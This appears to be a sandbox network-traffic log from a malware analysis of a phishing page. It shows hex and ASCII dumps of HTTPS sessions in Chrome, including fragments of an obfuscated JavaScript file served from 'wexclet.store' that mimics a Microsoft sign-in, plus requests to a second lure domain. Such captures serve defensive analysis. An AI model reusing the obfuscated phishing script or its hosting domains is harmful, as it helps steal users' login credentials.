2024-08-21 21:17:02 UTC	1378	IN	Data Raw: 70 28 22 5e 22 2b 4b 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 4b 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 57 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 59 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 5a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 24 3d 2f 5b 2b 7e 5d 2f 2c 5f 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 28 5b 5c 5c 64 61 Data Ascii: p("^"+K+"[>+~]\|:(even\|odd\|eq\|gt\|lt\|nth\|first\|last)(?:\$"+K+"((?:-\\d)?\\d)"+K+"\$\|)(?=[^-]\|$)","i")},W=/^(?:input\|select\|textarea\|button)$/i,X=/^h\d$/i,Y=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)\|(\w+)\|\.([\w-]+))$/,$=/[+~]/,_=new RegExp("\\\\([\\da
2024-08-21 21:17:02 UTC	1378	IN	Data Raw: 5b 33 5d 29 26 26 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 72 65 74 75 72 6e 20 47 2e 61 70 70 6c 79 28 64 2c 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 66 29 29 2c 64 7d 69 66 28 63 2e 71 73 61 26 26 21 41 5b 61 2b 22 20 22 5d 26 26 28 21 71 7c 7c 21 71 2e 74 65 73 74 28 61 29 29 29 7b 69 66 28 31 21 3d 3d 77 29 73 3d 62 2c 72 3d 61 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 28 6b 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3a 62 2e 73 65 74 Data Ascii: [3])&&c.getElementsByClassName&&b.getElementsByClassName)return G.apply(d,b.getElementsByClassName(f)),d}if(c.qsa&&!A[a+" "]&&(!q\|\|!q.test(a))){if(1!==w)s=b,r=a;else if("object"!==b.nodeName.toLowerCase()){(k=b.getAttribute("id"))?k=k.replace(ba,ca):b.set
2024-08-21 21:17:02 UTC	1378	IN	Data Raw: 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 61 7c 7c 62 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 61 26 26 65 61 28 62 29 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 22 6c 61 62 65 6c 22 69 6e 20 62 26 26 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 61 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 3d 2b 62 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 2c 66 3d 61 28 5b 5d 2c 63 2e 6c 65 6e 67 74 68 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 63 5b 65 3d 66 5b 67 5d 5d 26 26 28 63 5b 65 5d 3d 21 28 64 5b 65 Data Ascii: e.disabled===a:b.disabled===a:b.isDisabled===a\|\|b.isDisabled!==!a&&ea(b)===a:b.disabled===a:"label"in b&&b.disabled===a}}function pa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e
2024-08-21 21:17:02 UTC	1378	IN	Data Raw: 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 63 26 26 63 2e 76 61 6c 75 65 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 2c 64 2c 65 2c 66 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 69 66 28 66 29 7b 69 66 28 63 3d 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 2c 63 26 26 63 2e 76 61 6c 75 65 Data Ascii: n function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c,d,e,f=b.getElementById(a);if(f){if(c=f.getAttributeNode("id"),c&&c.value
2024-08-21 21:17:02 UTC	1378	IN	Data Raw: 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 2f 3e 3c 2f 73 65 6c 65 63 74 3e 22 3b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4b 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 61 2e 71 75 65 72 79 53 Data Ascii: bled='disabled'></a><select disabled='disabled'><option/></select>";var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+K+"[^$\|!~]?="),2!==a.queryS
2024-08-21 21:17:02 UTC	1378	IN	Data Raw: 44 6f 63 75 6d 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 62 29 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3a 34 26 64 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 63 2c 64 3d 30 2c 65 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6c 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e Data Ascii: Document===v&&t(v,b)?1:k?I(k,a)-I(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e\|\|!f)return a===n?-1:b===n?1:e?-1:f?1:k?I(k,a)-I(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)g.un

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	162.0.215.17	443	4180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:02 UTC	497	OUT	GET /0xa937eg29be0xcss.js HTTP/1.1 Host: wexclet.store Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-21 21:17:02 UTC	279	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 content-type: text/javascript last-modified: Mon, 19 Aug 2024 18:27:23 GMT accept-ranges: bytes content-length: 59004 date: Wed, 21 Aug 2024 21:17:02 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-08-21 21:17:02 UTC	16105	IN	Data Raw: 76 61 72 20 5f 30 78 37 37 30 34 20 3d 20 5b 0d 0a 20 20 20 20 27 72 65 61 64 79 27 2c 0d 0a 20 20 20 20 27 23 61 69 27 2c 0d 0a 20 20 20 20 27 23 6e 65 78 74 27 2c 0d 0a 20 20 20 20 27 2e 6c 6f 67 6f 69 6d 67 27 2c 0d 0a 20 20 20 20 27 73 72 63 27 2c 0d 0a 20 20 20 20 27 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 65 73 74 73 2f 32 2e 31 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 5f 61 5f 65 75 70 61 79 66 67 67 68 71 69 61 69 37 6b 39 73 6f 6c 36 6c 67 32 2e 69 63 6f 27 2c 0d 0a 20 20 20 20 27 23 64 69 76 31 27 2c 0d 0a 20 20 20 20 27 23 64 69 76 32 27 2c 0d 0a 20 20 20 20 27 23 61 69 63 68 27 2c 0d 0a 20 20 20 20 27 23 65 72 72 6f 72 27 2c 0d 0a 20 20 20 20 27 23 73 75 62 6d 69 74 2d 62 74 6e Data Ascii: var _0x7704 = [ 'ready', '#ai', '#next', '.logoimg', 'src', 'https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico', '#div1', '#div2', '#aich', '#error', '#submit-btn
2024-08-21 21:17:02 UTC	16384	IN	Data Raw: 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 5f 30 78 33 30 35 39 35 33 28 5f 30 78 33 62 36 61 35 39 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 27 74 4c 73 53 4b 27 3a 20 5f 30 78 32 65 37 61 28 27 30 78 31 30 27 29 2c 0d 0a 20 20 20 20 20 20 20 20 27 4c 62 71 4e 79 27 3a 20 5f 30 78 32 65 37 61 28 27 30 78 31 31 27 29 2c 0d 0a 20 20 20 20 20 20 20 20 27 66 45 55 42 4f 27 3a 20 66 75 6e 63 74 69 6f 6e 20 28 5f 30 78 32 37 32 31 38 39 2c 20 5f 30 78 33 33 34 39 38 63 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 5f 30 78 32 37 32 31 38 39 28 5f 30 78 33 33 34 39 38 63 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 27 6b 65 68 73 62 27 3a 20 66 75 6e 63 Data Ascii: { return _0x305953(_0x3b6a59); }, 'tLsSK': _0x2e7a('0x10'), 'LbqNy': _0x2e7a('0x11'), 'fEUBO': function (_0x272189, _0x33498c) { return _0x272189(_0x33498c); }, 'kehsb': func
2024-08-21 21:17:02 UTC	16384	IN	Data Raw: 5f 30 78 32 65 37 61 28 27 30 78 38 36 27 29 20 7d 29 5b 5f 30 78 32 65 37 61 28 27 30 78 35 63 27 29 5d 28 5f 30 78 37 30 65 32 62 62 5b 5f 30 78 32 65 37 61 28 27 30 78 36 33 27 29 5d 29 3b 0d 0a 20 20 20 20 5f 30 78 33 30 32 30 64 34 5b 27 61 70 70 65 6e 64 27 5d 28 5f 30 78 37 30 65 32 62 62 5b 5f 30 78 32 65 37 61 28 27 30 78 38 37 27 29 5d 29 3b 0d 0a 20 20 20 20 76 61 72 20 5f 30 78 34 30 33 36 33 62 20 3d 20 30 78 30 3b 0d 0a 20 20 20 20 76 61 72 20 5f 30 78 31 62 63 63 63 63 3b 0d 0a 20 20 20 20 76 61 72 20 5f 30 78 32 61 34 33 34 65 20 3d 20 30 78 31 33 38 38 3b 0d 0a 20 20 20 20 76 61 72 20 5f 30 78 35 65 32 62 37 65 20 3d 20 61 74 6f 62 28 5f 30 78 37 30 65 32 62 62 5b 27 44 57 70 73 64 27 5d 28 5f 30 78 37 30 65 32 62 62 5b 27 44 57 70 73 64 Data Ascii: _0x2e7a('0x86') })[_0x2e7a('0x5c')](_0x70e2bb[_0x2e7a('0x63')]); _0x3020d4['append'](_0x70e2bb[_0x2e7a('0x87')]); var _0x40363b = 0x0; var _0x1bcccc; var _0x2a434e = 0x1388; var _0x5e2b7e = atob(_0x70e2bb['DWpsd'](_0x70e2bb['DWpsd
2024-08-21 21:17:02 UTC	10131	IN	Data Raw: 27 29 5d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 30 78 36 34 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 74 69 6e 75 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 27 33 27 3a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 5f 30 78 32 65 37 61 28 27 30 78 31 65 27 29 29 5b 5f 30 78 32 65 37 61 28 27 30 78 38 39 27 29 5d 28 5f 30 78 37 30 65 32 62 62 5b 5f 30 78 32 65 37 61 28 27 30 78 66 38 27 29 5d 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 74 69 6e 75 65 3b 0d 0a 20 20 20 20 Data Ascii: ')] }, 0x64); continue; case '3': $(_0x2e7a('0x1e'))[_0x2e7a('0x89')](_0x70e2bb[_0x2e7a('0xf8')]); continue;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	162.0.215.17	443	4180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:03 UTC	357	OUT	GET /0xa937eg29be0xcss.js HTTP/1.1 Host: wexclet.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-21 21:17:03 UTC	279	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 content-type: text/javascript last-modified: Mon, 19 Aug 2024 18:27:23 GMT accept-ranges: bytes content-length: 59004 date: Wed, 21 Aug 2024 21:17:03 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-08-21 21:17:03 UTC	16105	IN	Data Raw: 76 61 72 20 5f 30 78 37 37 30 34 20 3d 20 5b 0d 0a 20 20 20 20 27 72 65 61 64 79 27 2c 0d 0a 20 20 20 20 27 23 61 69 27 2c 0d 0a 20 20 20 20 27 23 6e 65 78 74 27 2c 0d 0a 20 20 20 20 27 2e 6c 6f 67 6f 69 6d 67 27 2c 0d 0a 20 20 20 20 27 73 72 63 27 2c 0d 0a 20 20 20 20 27 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 65 73 74 73 2f 32 2e 31 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 5f 61 5f 65 75 70 61 79 66 67 67 68 71 69 61 69 37 6b 39 73 6f 6c 36 6c 67 32 2e 69 63 6f 27 2c 0d 0a 20 20 20 20 27 23 64 69 76 31 27 2c 0d 0a 20 20 20 20 27 23 64 69 76 32 27 2c 0d 0a 20 20 20 20 27 23 61 69 63 68 27 2c 0d 0a 20 20 20 20 27 23 65 72 72 6f 72 27 2c 0d 0a 20 20 20 20 27 23 73 75 62 6d 69 74 2d 62 74 6e Data Ascii: var _0x7704 = [ 'ready', '#ai', '#next', '.logoimg', 'src', 'https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico', '#div1', '#div2', '#aich', '#error', '#submit-btn
2024-08-21 21:17:03 UTC	5499	IN	Data Raw: 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 5f 30 78 33 30 35 39 35 33 28 5f 30 78 33 62 36 61 35 39 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 27 74 4c 73 53 4b 27 3a 20 5f 30 78 32 65 37 61 28 27 30 78 31 30 27 29 2c 0d 0a 20 20 20 20 20 20 20 20 27 4c 62 71 4e 79 27 3a 20 5f 30 78 32 65 37 61 28 27 30 78 31 31 27 29 2c 0d 0a 20 20 20 20 20 20 20 20 27 66 45 55 42 4f 27 3a 20 66 75 6e 63 74 69 6f 6e 20 28 5f 30 78 32 37 32 31 38 39 2c 20 5f 30 78 33 33 34 39 38 63 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 5f 30 78 32 37 32 31 38 39 28 5f 30 78 33 33 34 39 38 63 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 27 6b 65 68 73 62 27 3a 20 66 75 6e 63 Data Ascii: { return _0x305953(_0x3b6a59); }, 'tLsSK': _0x2e7a('0x10'), 'LbqNy': _0x2e7a('0x11'), 'fEUBO': function (_0x272189, _0x33498c) { return _0x272189(_0x33498c); }, 'kehsb': func
2024-08-21 21:17:03 UTC	16384	IN	Data Raw: 20 20 27 70 64 51 51 67 27 3a 20 66 75 6e 63 74 69 6f 6e 20 28 5f 30 78 63 33 62 34 30 65 2c 20 5f 30 78 34 31 37 63 31 61 2c 20 5f 30 78 33 35 66 65 65 34 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 5f 30 78 63 33 62 34 30 65 28 5f 30 78 34 31 37 63 31 61 2c 20 5f 30 78 33 35 66 65 65 34 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 27 76 79 49 4c 48 27 3a 20 5f 30 78 32 65 37 61 28 27 30 78 33 31 27 29 2c 0d 0a 20 20 20 20 20 20 20 20 27 57 6e 41 4e 78 27 3a 20 66 75 6e 63 74 69 6f 6e 20 28 5f 30 78 33 65 64 65 31 62 2c 20 5f 30 78 35 31 39 34 31 33 2c 20 5f 30 78 32 65 38 39 65 32 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 5f 30 78 33 65 64 65 31 62 28 5f 30 78 35 31 39 Data Ascii: 'pdQQg': function (_0xc3b40e, _0x417c1a, _0x35fee4) { return _0xc3b40e(_0x417c1a, _0x35fee4); }, 'vyILH': _0x2e7a('0x31'), 'WnANx': function (_0x3ede1b, _0x519413, _0x2e89e2) { return _0x3ede1b(_0x519
2024-08-21 21:17:03 UTC	16384	IN	Data Raw: 20 76 61 72 20 5f 30 78 34 61 32 37 61 33 20 3d 20 5f 30 78 37 30 65 32 62 62 5b 5f 30 78 32 65 37 61 28 27 30 78 63 38 27 29 5d 5b 5f 30 78 32 65 37 61 28 27 30 78 62 30 27 29 5d 28 27 7c 27 29 2c 20 5f 30 78 32 32 36 35 66 61 20 3d 20 30 78 30 3b 0d 0a 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 21 21 5b 5d 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 77 69 74 63 68 20 28 5f 30 78 34 61 32 37 61 33 5b 5f 30 78 32 32 36 35 66 61 2b 2b 5d 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 27 30 27 3a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 5b 5f 30 78 32 65 37 61 28 27 30 78 63 39 27 29 5d 28 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 75 72 6c 27 3a 20 5f 30 78 37 30 65 32 62 62 5b 5f Data Ascii: var _0x4a27a3 = _0x70e2bb[_0x2e7a('0xc8')][_0x2e7a('0xb0')]('\|'), _0x2265fa = 0x0; while (!![]) { switch (_0x4a27a3[_0x2265fa++]) { case '0': $[_0x2e7a('0xc9')]({ 'url': _0x70e2bb[_
2024-08-21 21:17:03 UTC	4632	IN	Data Raw: 66 27 29 5d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 53 63 4b 6a 69 27 3a 20 5f 30 78 37 30 65 32 62 62 5b 27 57 4d 41 6c 72 27 5d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 51 72 4c 56 59 27 3a 20 5f 30 78 37 30 65 32 62 62 5b 5f 30 78 32 65 37 61 28 27 30 78 65 36 27 29 5d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 6f 4d 73 75 69 27 3a 20 5f 30 78 37 30 65 32 62 62 5b 5f 30 78 32 65 37 61 28 27 30 78 64 34 27 29 5d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 74 69 6e 75 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 Data Ascii: f')], 'ScKji': _0x70e2bb['WMAlr'], 'QrLVY': _0x70e2bb[_0x2e7a('0xe6')], 'oMsui': _0x70e2bb[_0x2e7a('0xd4')] }; continue; } break;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	13.107.246.64	443	4180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:04 UTC	602	OUT	GET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-21 21:17:04 UTC	764	IN	HTTP/1.1 200 OK Date: Wed, 21 Aug 2024 21:17:04 GMT Content-Type: image/x-icon Content-Length: 17174 Connection: close Cache-Control: public, max-age=604800 Last-Modified: Fri, 02 Nov 2018 20:25:25 GMT ETag: 0x8D6410152A9D7E1 x-ms-request-id: 57a59b26-801e-0049-3cff-f2be10000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240821T211704Z-15c77d89844zfzwvumakpphgy000000009dg00000000r38p x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-08-21 21:17:04 UTC	15620	IN	Data Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
2024-08-21 21:17:04 UTC	1554	IN	Data Raw: 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	199.188.200.183	443	4180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:04 UTC	562	OUT	GET /start/xls/images/key.png HTTP/1.1 Host: sopbtech.store Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
